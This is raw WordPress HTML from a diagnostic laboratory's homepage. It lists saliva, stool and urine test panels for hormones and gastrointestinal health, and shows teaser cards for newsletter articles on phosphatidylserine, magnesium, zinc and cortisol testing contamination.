class="quickfinder-item-box" style="background-color: #ffffff;"> <div class="quickfinder-item-inner"> <div class="quickfinder-item-image"> <div class="quickfinder-item-image-content" > <div class="quickfinder-item-image-wrapper quickfinder-item-picture quickfinder-item-image-shape-circle" style=""> <img width="250" height="250" src="https://www.diagnostechs.com/wp-content/uploads/2016/10/FHP-Icon.png" class=" quickfinder-img-size-medium wp-post-image" alt="FHP-Icon" srcset="https://www.diagnostechs.com/wp-content/uploads/2016/10/FHP-Icon-thegem-person-80.png 1x, https://www.diagnostechs.com/wp-content/uploads/2016/10/FHP-Icon-thegem-person-160.png 2x" sizes="100vw" /> </div> </div> </div> <div class="quickfinder-item-info-wrapper"> <div class="quickfinder-item-info " > <div class="quickfinder-item-title" >Female Hormones</div> <div class="quickfinder-item-text" >Measuring female hormones comprehensively requires samples that are collected over time. Our panels provide everything from a snapshot to a full cycle.</div> </div> </div> </div> </div> <a href="https://www.diagnostechs.com/our-tests/female-hormones/" target="_self" class="quickfinder-item-link"></a> </div> <div id="post-28345" class="quickfinder-item inline-column col-md-4 col-sm-6 col-xs-12 quickfinder-item-effect-image-scale icon-size-medium quickfinder-box-style-solid post-28345 thegem_qf_item type-thegem_qf_item status-publish has-post-thumbnail hentry"> <div class="quickfinder-item-box" style="background-color: #ffffff;"> <div class="quickfinder-item-inner"> <div class="quickfinder-item-image"> <div class="quickfinder-item-image-content" > <div class="quickfinder-item-image-wrapper quickfinder-item-picture quickfinder-item-image-shape-circle" style=""> <img width="250" height="250" src="https://www.diagnostechs.com/wp-content/uploads/2016/10/MHP-Icon.png" class=" quickfinder-img-size-medium wp-post-image" alt="Male Hormone Panel" srcset="https://www.diagnostechs.com/wp-content/uploads/2016/10/MHP-Icon-thegem-person-80.png 1x, https://www.diagnostechs.com/wp-content/uploads/2016/10/MHP-Icon-thegem-person-160.png 2x" sizes="100vw" /> </div> </div> </div> <div class="quickfinder-item-info-wrapper"> <div class="quickfinder-item-info " > <div class="quickfinder-item-title" >Male Hormones</div> <div class="quickfinder-item-text" >Male hormones like testosterone can have a great effect on mood and energy. Choose a male hormone panel to gain insight and direction for treatment.</div> </div> </div> </div> </div> <a href="https://www.diagnostechs.com/our-tests/male-hormones/" target="_self" class="quickfinder-item-link"></a> </div> <div id="post-28343" class="quickfinder-item inline-column col-md-4 col-sm-6 col-xs-12 quickfinder-item-effect-image-scale icon-size-medium quickfinder-box-style-solid post-28343 thegem_qf_item type-thegem_qf_item status-publish has-post-thumbnail hentry"> <div class="quickfinder-item-box" style="background-color: #ffffff;"> <div class="quickfinder-item-inner"> <div class="quickfinder-item-image"> <div class="quickfinder-item-image-content" > <div class="quickfinder-item-image-wrapper quickfinder-item-picture quickfinder-item-image-shape-circle" style=""> <img width="250" height="250" src="https://www.diagnostechs.com/wp-content/uploads/2016/10/GI-Icon.png" class=" quickfinder-img-size-medium wp-post-image" alt="GI-Icon" srcset="https://www.diagnostechs.com/wp-content/uploads/2016/10/GI-Icon-thegem-person-80.png 1x, https://www.diagnostechs.com/wp-content/uploads/2016/10/GI-Icon-thegem-person-160.png 2x" sizes="100vw" /> </div> </div> </div> <div class="quickfinder-item-info-wrapper"> <div class="quickfinder-item-info " > <div class="quickfinder-item-title" >GI Health Panels</div> <div class="quickfinder-item-text" >Comprehensive gastrointestinal testing is a great strength of our lab. Our panels can identify microbes, pathogens, parasites, and measure inflammation markers among others with our advanced expertise.</div> </div> </div> </div> </div> <a href="https://www.diagnostechs.com/our-tests/gastrointestinal-health/" target="_self" class="quickfinder-item-link"></a> </div> <div id="post-28342" class="quickfinder-item inline-column col-md-4 col-sm-6 col-xs-12 quickfinder-item-effect-image-scale icon-size-medium quickfinder-box-style-solid post-28342 thegem_qf_item type-thegem_qf_item status-publish has-post-thumbnail hentry"> <div class="quickfinder-item-box" style="background-color: #ffffff;"> <div class="quickfinder-item-inner"> <div class="quickfinder-item-image"> <div class="quickfinder-item-image-content" > <div class="quickfinder-item-image-wrapper quickfinder-item-picture quickfinder-item-image-shape-circle" style=""> <img width="250" height="246" src="https://www.diagnostechs.com/wp-content/uploads/2016/10/FLEXI_ICON_Met-ver3.png" class=" quickfinder-img-size-medium wp-post-image" alt="Flexi-Matrix Test Panels" srcset="https://www.diagnostechs.com/wp-content/uploads/2016/10/FLEXI_ICON_Met-ver3-thegem-person-80.png 1x, https://www.diagnostechs.com/wp-content/uploads/2016/10/FLEXI_ICON_Met-ver3-thegem-person-160.png 2x" sizes="100vw" /> </div> </div> </div> <div class="quickfinder-item-info-wrapper"> <div class="quickfinder-item-info " > <div class="quickfinder-item-title" >Flexi-Matrix Custom</div> <div class="quickfinder-item-text" >Flexi-Matrix custom test panels allow complete power to choose from our entire library of noninvasive saliva, stool, and urine tests allowing the provider to choose the perfect combination for their patient.</div> </div> </div> </div> </div> <a href="https://www.diagnostechs.com/our-tests/custom-flexi-matrix/" target="_self" class="quickfinder-item-link"></a> </div> <div id="post-28346" class="quickfinder-item inline-column col-md-4 col-sm-6 col-xs-12 quickfinder-item-effect-image-scale icon-size-medium quickfinder-box-style-solid post-28346 thegem_qf_item type-thegem_qf_item status-publish has-post-thumbnail hentry"> <div class="quickfinder-item-box" style="background-color: #ffffff;"> <div class="quickfinder-item-inner"> <div class="quickfinder-item-image"> <div class="quickfinder-item-image-content" > <div class="quickfinder-item-image-wrapper quickfinder-item-picture quickfinder-item-image-shape-circle" style=""> <img width="80" height="80" src="https://www.diagnostechs.com/wp-content/uploads/2016/10/2-layers4.png" class=" quickfinder-img-size-medium wp-post-image" alt="2-layers4" srcset="https://www.diagnostechs.com/wp-content/uploads/2016/10/2-layers4-thegem-person-80.png 1x, https://www.diagnostechs.com/wp-content/uploads/2016/10/2-layers4.png 2x" sizes="100vw" /> </div> </div> </div> <div class="quickfinder-item-info-wrapper"> <div class="quickfinder-item-info " > <div class="quickfinder-item-title" >Additional Tests</div> <div class="quickfinder-item-text" >We have many other specialized tests including a bone health panel, yeast panel and food sensitivity panel. Learn more about our entire range of tests and panels.<br /> <br /> </div> </div> </div> </div> </div> <a href="https://www.diagnostechs.com/our-tests/index-of-panels-tests/" target="_self" class="quickfinder-item-link"></a> </div> </div><div class="clearboth"></div><div class="gem-divider " style="margin-top: 80px;"></div></div></div></div></div></div></div></div><div class="vc_row-full-width-before"></div><div id="vc_row-5cdd8fcbc2f30" data-vc-full-width="true" data-vc-full-width-init="false" class="vc_row wpb_row vc_row-fluid vc_custom_1478097542723 vc_row-has-fill"><script type="text/javascript">if (typeof(gem_fix_fullwidth_position) == "function") { gem_fix_fullwidth_position(document.getElementById("vc_row-5cdd8fcbc2f30")); }</script><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <h1 class="title-h1" style="text-align: left;"><span style="color: #00a4ef; font-size: 36pt;">Questions?</span></h1> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element wpb_animate_when_almost_visible wpb_flipInX flipInX" > <div class="wpb_wrapper"> <p><span style="color: #ffffff;">Please contact us by phone, email, fax or online. We are happy to help you with questions about tests, sample collection, billing, and any other concern that you have.</span></p> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="gem-button-container gem-button-position-left"><a title="Contact Us" class="gem-button gem-button-size-medium gem-button-style-outline gem-button-text-weight-thin gem-button-border-1" style="border-radius: 0px;border-color: #00a4ef;color: #00a4ef;" onmouseleave="this.style.borderColor='#00a4ef';this.style.backgroundColor='transparent';this.style.color='#00a4ef';" onmouseenter="this.style.borderColor='#00a4ef';this.style.backgroundColor='#00a4ef';this.style.color='#ffffff';" href="https://www.diagnostechs.com/contact-us/" target="_self">Ask Us</a></div> </div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div class="vc_row-full-width-before"></div><div id="vc_row-5cdd8fcbc2f30" data-vc-full-width="true" data-vc-full-width-init="false" class="vc_row wpb_row vc_row-fluid wpb_animate_when_almost_visible wpb_fadeInLeft fadeInLeft vc_custom_1529032315416 vc_row-has-fill"><script type="text/javascript">if (typeof(gem_fix_fullwidth_position) == "function") { gem_fix_fullwidth_position(document.getElementById("vc_row-5cdd8fcbc2f30")); }</script><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="clearboth"></div><div class="gem-divider " style="margin-top: 70px;"></div> <div class="wpb_text_column wpb_content_element wpb_animate_when_almost_visible wpb_flipInY flipInY" > <div class="wpb_wrapper"> <div class="title-h2" style="text-align: center;"><span style="color: #00a4ef;">Articles</span></div> </div> </div> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p style="text-align: center; max-width: 832px; margin: 0 auto;">Here are some highlighted articles from our latest ChronoBiology Newsletter.</p> </div> </div> <div class="clearboth"></div><div class="gem-divider " style="margin-top: 70px;"></div><div class="blog blog-style-justified-4x justified-style-1 inline-row clearfix item-animation-move-up" data-next-page="0"> <article id="post-29530" class="col-lg-3 col-md-3 col-sm-6 col-xs-6 inline-column item-animations-not-inited post-29530 post type-post status-publish format-standard has-post-thumbnail hentry category-chronobiology23 tag-phosphatidylserine tag-phospholipid tag-phosphoserine"> <div class="post-content-wrapper"> <div class="post-image"><div class="post-featured-content"><a href="https://www.diagnostechs.com/2016/08/05/phosphatidylserine/"> <picture> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/05/PS-diagram-thegem-blog-justified.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/05/PS-diagram-thegem-blog-justified.png 2x" media="(max-width: 600px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/05/PS-diagram-thegem-blog-justified-4x.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/05/PS-diagram-thegem-blog-justified.png 2x" media="(max-width: 992px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/05/PS-diagram-thegem-blog-justified-3x-small.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/05/PS-diagram-thegem-blog-justified.png 2x" media="(max-width: 1125px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/05/PS-diagram-thegem-blog-justified-4x.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/05/PS-diagram-thegem-blog-justified.png 2x" media="(max-width: 1920px)" sizes="100vw"> <img src="https://www.diagnostechs.com/wp-content/uploads/2018/05/PS-diagram-thegem-blog-justified.png" width="640" height="480" class="img-responsive" alt="Phosphatidylserine Composition" /> </picture> </a></div></div> <div class="description"> <div class="post-meta-conteiner"> <div class="post-meta-right"> </div> </div> <div class="post-title"> <div class="entry-title title-h4"><a href="https://www.diagnostechs.com/2016/08/05/phosphatidylserine/" rel="bookmark"><span class="light">Phosphatidylserine: Cell Membrane Nutrient for Stress Resiliency</span></a></div> </div> <div class="post-text"> <div class="summary"> <p>Phosphatidylserine (PS) and other phospholipid compounds constitute the fundamental structural matrix of all cell membranes. The PS molecular structure consists&#8230;</p> </div> </div> <div class="info clearfix"> <div class="post-footer-sharing"><div class="gem-button-container gem-button-position-inline"><a class="gem-button gem-button-size-tiny gem-button-style-flat gem-button-text-weight-normal gem-button-empty" style="border-radius: 3px;" onmouseleave="" onmouseenter="" href="#" target="_self"><i class="gem-print-icon gem-icon-pack-thegem-icons gem-icon-share"></i></a></div> <div class="sharing-popup"> <div class="socials-sharing socials socials-colored-hover "> <a class="socials-item" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F05%2Fphosphatidylserine%2F" title="Facebook"><i class="socials-item-icon facebook"></i></a> <a class="socials-item" target="_blank" href="https://twitter.com/intent/tweet?text=Phosphatidylserine%3A+Cell+Membrane+Nutrient+for+Stress+Resiliency&#038;url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F05%2Fphosphatidylserine%2F" title="Twitter"><i class="socials-item-icon twitter"></i></a> <a class="socials-item" target="_blank" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F05%2Fphosphatidylserine%2F" title="Google Plus"><i class="socials-item-icon google-plus"></i></a> <a class="socials-item" target="_blank" href="https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F05%2Fphosphatidylserine%2F&#038;description=Phosphatidylserine%3A+Cell+Membrane+Nutrient+for+Stress+Resiliency&#038;media=https%3A%2F%2Fwww.diagnostechs.com%2Fwp-content%2Fuploads%2F2018%2F05%2FPS-diagram-thegem-blog-timeline-large.png" title="Pinterest"><i class="socials-item-icon pinterest"></i></a> <a class="socials-item" target="_blank" href="http://tumblr.com/widgets/share/tool?canonicalUrl=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F05%2Fphosphatidylserine%2F" title="Tumblr"><i class="socials-item-icon tumblr"></i></a> <a class="socials-item" target="_blank" href="https://www.linkedin.com/shareArticle?mini=true&#038;url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F05%2Fphosphatidylserine%2F&#038;title=Phosphatidylserine%3A+Cell+Membrane+Nutrient+for+Stress+Resiliency&amp;summary=Phosphatidylserine+%28PS%29+and+other+phospholipid+compounds+constitute+the+fundamental+structural+matrix+of+all+cell+membranes.+The+PS+molecular+structure+consists..." title="LinkedIn"><i class="socials-item-icon linkedin"></i></a> <a class="socials-item" target="_blank" href="http://www.stumbleupon.com/submit?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F05%2Fphosphatidylserine%2F&#038;title=Phosphatidylserine%3A+Cell+Membrane+Nutrient+for+Stress+Resiliency" title="StumbleUpon"><i class="socials-item-icon stumbleupon"></i></a> </div> <svg class="sharing-styled-arrow"><use xlink:href="https://www.diagnostechs.com/wp-content/themes/thegem/css/post-arrow.svg#dec-post-arrow"></use></svg></div></div> <div class="post-read-more"><div class="gem-button-container gem-button-position-inline"><a class="gem-button gem-button-size-tiny gem-button-style-outline gem-button-text-weight-normal gem-button-border-2" style="border-radius: 3px;" onmouseleave="" onmouseenter="" href="https://www.diagnostechs.com/2016/08/05/phosphatidylserine/" target="_self">Read More</a></div> </div> </div> </div> </div> </article> <article id="post-29785" class="col-lg-3 col-md-3 col-sm-6 col-xs-6 inline-column item-animations-not-inited post-29785 post type-post status-publish format-standard has-post-thumbnail hentry category-chronobiology23 tag-magnesium tag-stress"> <div class="post-content-wrapper"> <div class="post-image"><div class="post-featured-content"><a href="https://www.diagnostechs.com/2016/08/04/magnesium-and-stress/"> <picture> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Mg-thegem-blog-justified.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Mg-thegem-blog-justified.png 2x" media="(max-width: 600px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Mg-thegem-blog-justified-4x.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Mg-thegem-blog-justified.png 2x" media="(max-width: 992px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Mg-thegem-blog-justified-3x-small.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Mg-thegem-blog-justified.png 2x" media="(max-width: 1125px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Mg-thegem-blog-justified-4x.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Mg-thegem-blog-justified.png 2x" media="(max-width: 1920px)" sizes="100vw"> <img src="https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Mg-thegem-blog-justified.png" width="640" height="480" class="img-responsive" alt="Magnesium" /> </picture> </a></div></div> <div class="description"> <div class="post-meta-conteiner"> <div class="post-meta-right"> </div> </div> <div class="post-title"> <div class="entry-title title-h4"><a href="https://www.diagnostechs.com/2016/08/04/magnesium-and-stress/" rel="bookmark"><span class="light">Magnesium and Stress</span></a></div> </div> <div class="post-text"> <div class="summary"> <p>Magnesium and Stress Magnesium is sometimes considered the forgotten mineral, yet magnesium plays many crucial roles in human physiology. Magnesium&#8230;</p> </div> </div> <div class="info clearfix"> <div class="post-footer-sharing"><div class="gem-button-container gem-button-position-inline"><a class="gem-button gem-button-size-tiny gem-button-style-flat gem-button-text-weight-normal gem-button-empty" style="border-radius: 3px;" onmouseleave="" onmouseenter="" href="#" target="_self"><i class="gem-print-icon gem-icon-pack-thegem-icons gem-icon-share"></i></a></div> <div class="sharing-popup"> <div class="socials-sharing socials socials-colored-hover "> <a class="socials-item" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fmagnesium-and-stress%2F" title="Facebook"><i class="socials-item-icon facebook"></i></a> <a class="socials-item" target="_blank" href="https://twitter.com/intent/tweet?text=Magnesium+and+Stress&#038;url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fmagnesium-and-stress%2F" title="Twitter"><i class="socials-item-icon twitter"></i></a> <a class="socials-item" target="_blank" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fmagnesium-and-stress%2F" title="Google Plus"><i class="socials-item-icon google-plus"></i></a> <a class="socials-item" target="_blank" href="https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fmagnesium-and-stress%2F&#038;description=Magnesium+and+Stress&#038;media=https%3A%2F%2Fwww.diagnostechs.com%2Fwp-content%2Fuploads%2F2018%2F06%2FPeriodic-Table-Mg.png" title="Pinterest"><i class="socials-item-icon pinterest"></i></a> <a class="socials-item" target="_blank" href="http://tumblr.com/widgets/share/tool?canonicalUrl=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fmagnesium-and-stress%2F" title="Tumblr"><i class="socials-item-icon tumblr"></i></a> <a class="socials-item" target="_blank" href="https://www.linkedin.com/shareArticle?mini=true&#038;url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fmagnesium-and-stress%2F&#038;title=Magnesium+and+Stress&amp;summary=Magnesium+and+Stress+Magnesium+is+sometimes+considered+the+forgotten+mineral%2C+yet+magnesium+plays+many+crucial+roles+in+human+physiology.+Magnesium..." title="LinkedIn"><i class="socials-item-icon linkedin"></i></a> <a class="socials-item" target="_blank" href="http://www.stumbleupon.com/submit?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fmagnesium-and-stress%2F&#038;title=Magnesium+and+Stress" title="StumbleUpon"><i class="socials-item-icon stumbleupon"></i></a> </div> <svg class="sharing-styled-arrow"><use xlink:href="https://www.diagnostechs.com/wp-content/themes/thegem/css/post-arrow.svg#dec-post-arrow"></use></svg></div></div> <div class="post-read-more"><div class="gem-button-container gem-button-position-inline"><a class="gem-button gem-button-size-tiny gem-button-style-outline gem-button-text-weight-normal gem-button-border-2" style="border-radius: 3px;" onmouseleave="" onmouseenter="" href="https://www.diagnostechs.com/2016/08/04/magnesium-and-stress/" target="_self">Read More</a></div> </div> </div> </div> </div> </article> <article id="post-29829" class="col-lg-3 col-md-3 col-sm-6 col-xs-6 inline-column item-animations-not-inited post-29829 post type-post status-publish format-standard has-post-thumbnail hentry category-chronobiology23 tag-response tag-stress tag-zinc"> <div class="post-content-wrapper"> <div class="post-image"><div class="post-featured-content"><a href="https://www.diagnostechs.com/2016/08/04/zinc-and-stress-response/"> <picture> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Zn-thegem-blog-justified.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Zn-thegem-blog-justified.png 2x" media="(max-width: 600px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Zn-thegem-blog-justified-4x.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Zn-thegem-blog-justified.png 2x" media="(max-width: 992px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Zn-thegem-blog-justified-3x-small.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Zn-thegem-blog-justified.png 2x" media="(max-width: 1125px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Zn-thegem-blog-justified-4x.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Zn-thegem-blog-justified.png 2x" media="(max-width: 1920px)" sizes="100vw"> <img src="https://www.diagnostechs.com/wp-content/uploads/2018/06/Periodic-Table-Zn-thegem-blog-justified.png" width="640" height="480" class="img-responsive" alt="Zinc" /> </picture> </a></div></div> <div class="description"> <div class="post-meta-conteiner"> <div class="post-meta-right"> </div> </div> <div class="post-title"> <div class="entry-title title-h4"><a href="https://www.diagnostechs.com/2016/08/04/zinc-and-stress-response/" rel="bookmark"><span class="light">Zinc and Stress Response</span></a></div> </div> <div class="post-text"> <div class="summary"> <p>Zinc and Stress Response Zinc is an essential trace mineral naturally present in some foods and involved in numerous aspects&#8230;</p> </div> </div> <div class="info clearfix"> <div class="post-footer-sharing"><div class="gem-button-container gem-button-position-inline"><a class="gem-button gem-button-size-tiny gem-button-style-flat gem-button-text-weight-normal gem-button-empty" style="border-radius: 3px;" onmouseleave="" onmouseenter="" href="#" target="_self"><i class="gem-print-icon gem-icon-pack-thegem-icons gem-icon-share"></i></a></div> <div class="sharing-popup"> <div class="socials-sharing socials socials-colored-hover "> <a class="socials-item" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fzinc-and-stress-response%2F" title="Facebook"><i class="socials-item-icon facebook"></i></a> <a class="socials-item" target="_blank" href="https://twitter.com/intent/tweet?text=Zinc+and+Stress+Response&#038;url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fzinc-and-stress-response%2F" title="Twitter"><i class="socials-item-icon twitter"></i></a> <a class="socials-item" target="_blank" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fzinc-and-stress-response%2F" title="Google Plus"><i class="socials-item-icon google-plus"></i></a> <a class="socials-item" target="_blank" href="https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fzinc-and-stress-response%2F&#038;description=Zinc+and+Stress+Response&#038;media=https%3A%2F%2Fwww.diagnostechs.com%2Fwp-content%2Fuploads%2F2018%2F06%2FPeriodic-Table-Zn.png" title="Pinterest"><i class="socials-item-icon pinterest"></i></a> <a class="socials-item" target="_blank" href="http://tumblr.com/widgets/share/tool?canonicalUrl=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fzinc-and-stress-response%2F" title="Tumblr"><i class="socials-item-icon tumblr"></i></a> <a class="socials-item" target="_blank" href="https://www.linkedin.com/shareArticle?mini=true&#038;url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fzinc-and-stress-response%2F&#038;title=Zinc+and+Stress+Response&amp;summary=Zinc+and+Stress+Response+Zinc+is+an+essential+trace+mineral+naturally+present+in+some+foods+and+involved+in+numerous+aspects..." title="LinkedIn"><i class="socials-item-icon linkedin"></i></a> <a class="socials-item" target="_blank" href="http://www.stumbleupon.com/submit?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F04%2Fzinc-and-stress-response%2F&#038;title=Zinc+and+Stress+Response" title="StumbleUpon"><i class="socials-item-icon stumbleupon"></i></a> </div> <svg class="sharing-styled-arrow"><use xlink:href="https://www.diagnostechs.com/wp-content/themes/thegem/css/post-arrow.svg#dec-post-arrow"></use></svg></div></div> <div class="post-read-more"><div class="gem-button-container gem-button-position-inline"><a class="gem-button gem-button-size-tiny gem-button-style-outline gem-button-text-weight-normal gem-button-border-2" style="border-radius: 3px;" onmouseleave="" onmouseenter="" href="https://www.diagnostechs.com/2016/08/04/zinc-and-stress-response/" target="_self">Read More</a></div> </div> </div> </div> </div> </article> <article id="post-29809" class="col-lg-3 col-md-3 col-sm-6 col-xs-6 inline-column item-animations-not-inited post-29809 post type-post status-publish format-standard has-post-thumbnail hentry category-chronobiology23 tag-contamination tag-cortisol tag-creams tag-hormones tag-steroids tag-testing"> <div class="post-content-wrapper"> <div class="post-image"><div class="post-featured-content"><a href="https://www.diagnostechs.com/2016/08/03/sources-of-contamination-in-cortisol-testing/"> <picture> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/contamination.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/contamination.png 2x" media="(max-width: 600px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/contamination-thegem-blog-justified-4x.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/contamination.png 2x" media="(max-width: 992px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/contamination-thegem-blog-justified-3x-small.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/contamination.png 2x" media="(max-width: 1125px)" sizes="100vw"> <source srcset="https://www.diagnostechs.com/wp-content/uploads/2018/06/contamination-thegem-blog-justified-4x.png 1x, https://www.diagnostechs.com/wp-content/uploads/2018/06/contamination.png 2x" media="(max-width: 1920px)" sizes="100vw"> <img src="https://www.diagnostechs.com/wp-content/uploads/2018/06/contamination.png" width="447" height="459" class="img-responsive" alt="Sources of Contamination in Cortisol Testing" /> </picture> </a></div></div> <div class="description"> <div class="post-meta-conteiner"> <div class="post-meta-right"> </div> </div> <div class="post-title"> <div class="entry-title title-h4"><a href="https://www.diagnostechs.com/2016/08/03/sources-of-contamination-in-cortisol-testing/" rel="bookmark"><span class="light">Sources of Contamination in Cortisol Testing</span></a></div> </div> <div class="post-text"> <div class="summary"> <p>When cortisol results are abnormally high, providers may want to check for overt and hidden sources of hormone exposure. The&#8230;</p> </div> </div> <div class="info clearfix"> <div class="post-footer-sharing"><div class="gem-button-container gem-button-position-inline"><a class="gem-button gem-button-size-tiny gem-button-style-flat gem-button-text-weight-normal gem-button-empty" style="border-radius: 3px;" onmouseleave="" onmouseenter="" href="#" target="_self"><i class="gem-print-icon gem-icon-pack-thegem-icons gem-icon-share"></i></a></div> <div class="sharing-popup"> <div class="socials-sharing socials socials-colored-hover "> <a class="socials-item" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F03%2Fsources-of-contamination-in-cortisol-testing%2F" title="Facebook"><i class="socials-item-icon facebook"></i></a> <a class="socials-item" target="_blank" href="https://twitter.com/intent/tweet?text=Sources+of+Contamination+in+Cortisol+Testing&#038;url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F03%2Fsources-of-contamination-in-cortisol-testing%2F" title="Twitter"><i class="socials-item-icon twitter"></i></a> <a class="socials-item" target="_blank" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F03%2Fsources-of-contamination-in-cortisol-testing%2F" title="Google Plus"><i class="socials-item-icon google-plus"></i></a> <a class="socials-item" target="_blank" href="https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F03%2Fsources-of-contamination-in-cortisol-testing%2F&#038;description=Sources+of+Contamination+in+Cortisol+Testing&#038;media=https%3A%2F%2Fwww.diagnostechs.com%2Fwp-content%2Fuploads%2F2018%2F06%2Fcontamination.png" title="Pinterest"><i class="socials-item-icon pinterest"></i></a> <a class="socials-item" target="_blank" href="http://tumblr.com/widgets/share/tool?canonicalUrl=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F03%2Fsources-of-contamination-in-cortisol-testing%2F" title="Tumblr"><i class="socials-item-icon tumblr"></i></a> <a class="socials-item" target="_blank" href="https://www.linkedin.com/shareArticle?mini=true&#038;url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F03%2Fsources-of-contamination-in-cortisol-testing%2F&#038;title=Sources+of+Contamination+in+Cortisol+Testing&amp;summary=When+cortisol+results+are+abnormally+high%2C+providers+may+want+to+check+for+overt+and+hidden+sources+of+hormone+exposure.+The..." title="LinkedIn"><i class="socials-item-icon linkedin"></i></a> <a class="socials-item" target="_blank" href="http://www.stumbleupon.com/submit?url=https%3A%2F%2Fwww.diagnostechs.com%2F2016%2F08%2F03%2Fsources-of-contamination-in-cortisol-testing%2F&#038;title=Sources+of+Contamination+in+Cortisol+Testing" title="StumbleUpon"><i class="socials-item-icon stumbleupon"></i></a> </div> <svg class="sharing-styled-arrow"><use xlink:href="https://www.diagnostechs.com/wp-content/themes/thegem/css/post-arrow.svg#dec-post-arrow"></use></svg></div></div> <div class="post-read-more"><div class="gem-button-container gem-button-position-inline"><a class="gem-button gem-button-size-tiny gem-button-style-outline gem-button-text-weight-normal gem-button-border-2" style="border-radius: 3px;" onmouseleave="" onmouseenter="" href="https://www.diagnostechs.com/2016/08/03/sources-of-contamination-in-cortisol-testing/" target="_self">Read More</a></div> </div> </div> </div> </div> </article> </div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div class="vc_row-full-width-before"></div><div id="vc_row-5cdd8fcbdd9c1" data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row 